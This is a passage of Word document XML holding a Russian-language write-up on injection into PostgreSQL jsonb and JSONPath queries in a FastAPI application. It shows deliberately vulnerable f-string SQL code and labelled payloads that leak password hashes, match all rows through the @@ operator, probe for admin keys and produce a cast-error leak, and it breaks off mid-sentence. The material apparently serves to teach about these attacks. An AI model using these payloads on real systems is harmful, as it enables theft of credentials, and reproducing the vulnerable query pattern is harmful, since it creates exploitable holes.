          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>field</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7B5E28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD7CE1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140B2779" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT data-&gt;&gt;'password_hash' FROM user_profiles WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF606E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Возвращается hash напрямую в HTTP-response. Application-логика ожидала, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>field</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это allowed-список из 3 значений; никакой валидации не было.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B72A8E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — JSONPath injection через @@-оператор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C569A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Контекст: фильтр по JSON-доку через jsonpath. Код:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6871E734" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/profiles/match")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BFAC0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def match(criteria_path: str, criteria_value: str, session: AsyncSession = Depends(get_session)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783859B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = text(f"SELECT id FROM user_profiles WHERE data @@ '$.{criteria_path} == \"{criteria_value}\"'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D6D05F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60048EF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [r[0] for r in result]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EDC4B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Atакующий контролирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>criteria_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>criteria_value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — оба идут в JSONPath-выражение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A08DA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>criteria_path</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27670C19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_hash || $.password_hash like_regex "^.*$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3747D90C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>criteria_value</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5E8384" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E836D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458CD8C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id FROM user_profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4765421A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE data @@ '$.password_hash || $.password_hash like_regex "^.*$ == ""'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A5CA4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JSONPath PG 12+ интерпретирует это как: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$.password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ИЛИ regex match </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>^.*$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (match anything). Что-то одно из двух — true → WHERE возвращает все профили. Это эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE 1=1</w:t>
      </w:r>
      <w:r>
        <w:t>, но через jsonpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4E79D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Дополнительные JSONPath-возможности для атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A4D15F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$.** ? (@ == "admin")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — рекурсивный спуск, ищет ключ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на любой глубине документа. Полезно для recon неизвестной структуры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01000E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$.users[*].password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — array-iteration через jsonpath. Если документ — массив профилей, leak всех hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6BEB10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$.* ? (@.role == "admin")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — фильтрация всех ключей с условием.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00256D5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$.x.size()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — служебная функция, возвращает размер. Через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.size() &gt; 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — boolean oracle для blind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E0D370" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — Cast confusion для error-based leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1C3CF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: эндпоинт ожидает, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;&gt;'role_id'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — целое число, и cast-ит в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для использования в дальнейшем коде:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585AB5D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q = text(f"SELECT (data-&gt;&gt;'role_id')::int FROM user_profiles WHERE id = {user_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE5C69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параметр; атакующий может управлять </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через предыдущий POST-эндпоинт (или просто использует существующего пользователя, у которого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит non-numeric значение).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2BEC2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атакующий записал:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1077DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{"role_id": "(SELECT password_hash FROM users WHERE email='admin@co.com')"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D2C9A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Тогда:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528DDA63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT (data-&gt;&gt;'role_id')::int FROM user_profiles WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FFEAF2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG читает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;&gt;'role_id'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → text-литерал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"(SELECT password_hash...)"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (как строка, не как SQL!). Cast </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> падает с:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E51DBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR:  invalid input syntax for type integer: "(SELECT password_hash FROM users WHERE email='admin@co.com')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB26446" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Текст leaked в error. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Но</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: subquery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не выполнилась</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data-&gt;&gt;'role_id'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает literal text без интерпретации. Cast-error содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>строку, которую атакующий записал</w:t>
      </w:r>
      <w:r>
        <w:t>, не результат выполнения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BDCD5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Реальный leak через cast confusion требует, чтобы subquery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>выполнилась</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> перед попаданием в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это достижимо через инжекцию в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>другую точку запроса</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — например, через jsonb_set с computed value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C2CE6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload в эндпоинт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>POST /profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с user-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD32B4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02310836" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "role_id": "{{ (SELECT password_hash FROM users WHERE email='admin@co.com' LIMIT 1) }}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E14ADED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A611A50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если приложение наивно сохраняет JSON как есть, дальше </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
